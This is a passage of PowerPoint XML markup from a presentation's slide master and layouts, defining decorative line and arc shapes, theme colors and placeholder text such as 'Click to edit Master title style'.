            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3" y="559"/>
              <a:ext cx="4192" cy="1796"/>
              <a:chOff x="3" y="559"/>
              <a:chExt cx="4192" cy="1796"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Line 1083"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="506" y="559"/>
                <a:ext cx="0" cy="1796"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Line 1084"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3" y="1924"/>
                <a:ext cx="3211" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Line 1085"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="384" y="938"/>
                <a:ext cx="3811" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Arc 1086"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="426" y="860"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 1087"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1480" y="1952"/>
              <a:ext cx="3808" cy="1812"/>
              <a:chOff x="1480" y="1952"/>
              <a:chExt cx="3808" cy="1812"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Line 1088"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipV="1">
                <a:off x="1480" y="3442"/>
                <a:ext cx="3808" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Line 1089"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="5172" y="1952"/>
                <a:ext cx="0" cy="1812"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Arc 1090"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm rot="5400000">
                <a:off x="5097" y="3347"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069123" name="Rectangle 1091"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1752600"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069124" name="Rectangle 1092" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3309938"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Rectangle 1093"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="62484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400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Rectangle 1094"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6248400"/>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1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Rectangle 1095"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="62484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1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9087C74D-BE61-4172-A4D5-55D87883D978}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="40458C"/>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D24062E6-0B63-4CDF-9F0E-6E03406585A8}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>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96050" y="304800"/>
            <a:ext cx="1962150" cy="5943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304800"/>
            <a:ext cx="5734050" cy="5943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772400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>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648200" y="1600200"/>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772400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>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593367"/>
            <a:ext cx="8520600" cy="7636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18" name="Shape 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1536633"/>
            <a:ext cx="8520600" cy="4555200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t"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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472458" y="6217623"/>
            <a:ext cx="548700" cy="524800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6051491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1026"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 1027"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Rectangle 1028"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="2112" y="0"/>
                <a:ext cx="3648" cy="96"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 1029"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5760" cy="4320"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="5760" cy="4320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="Line 1030"/>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9" name="Line 1031"/>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20" name="Line 1032"/>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21" name="Line 1033"/>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22" name="Line 1034"/>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23" name="Line 1035"/>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24" name="Line 1036"/>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25" name="Line 1037"/>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26" name="Line 1038"/>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27" name="Line 1039"/>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28" name="Line 1040"/>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29" name="Line 1041"/>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30" name="Line 1042"/>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31" name="Line 1043"/>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32" name="Line 1044"/>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33" name="Line 1045"/>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34" name="Line 1046"/>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35" name="Line 1047"/>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36" name="Line 1048"/>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37" name="Line 1049"/>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38" name="Line 1050"/>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39" name="Line 1051"/>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40" name="Line 1052"/>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41" name="Line 1053"/>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42" name="Line 1054"/>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43" name="Line 1055"/>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44" name="Line 1056"/>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45" name="Line 1057"/>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46" name="Line 1058"/>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47" name="Line 1059"/>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48" name="Line 1060"/>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49" name="Line 1061"/>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50" name="Line 1062"/>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51" name="Line 1063"/>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52" name="Line 1064"/>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53" name="Line 1065"/>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54" name="Line 1066"/>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55" name="Line 1067"/>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56" name="Line 1068"/>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57" name="Line 1069"/>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58" name="Line 1070"/>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59" name="Line 1071"/>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60" name="Line 1072"/>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61" name="Line 1073"/>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62" name="Line 1074"/>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63" name="Line 1075"/>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64" name="Line 1076"/>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65" name="Line 1077"/>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66" name="Line 1078"/>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67" name="Line 1079"/>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68" name="Line 1080"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Line 1081"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="5568" y="0"/>
                <a:ext cx="0" cy="1488"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 1082"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3" y="559"/>
              <a:ext cx="4192" cy="1796"/>
              <a:chOff x="3" y="559"/>
              <a:chExt cx="4192" cy="1796"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Line 1083"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="506" y="559"/>
                <a:ext cx="0" cy="1796"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Line 1084"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3" y="1924"/>
                <a:ext cx="3211" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Line 1085"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="384" y="938"/>
                <a:ext cx="3811" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Arc 1086"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="426" y="860"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 1087"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1480" y="1952"/>
              <a:ext cx="3808" cy="1812"/>
              <a:chOff x="1480" y="1952"/>
              <a:chExt cx="3808" cy="1812"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Line 1088"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipV="1">
                <a:off x="1480" y="3442"/>
                <a:ext cx="3808" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Line 1089"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="5172" y="1952"/>
                <a:ext cx="0" cy="1812"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Arc 1090"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm rot="5400000">
                <a:off x="5097" y="3347"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069123" name="Rectangle 1091"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1752600"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069124" name="Rectangle 1092" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3309938"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Rectangle 1093"/>
          <p:cNvSpPr>
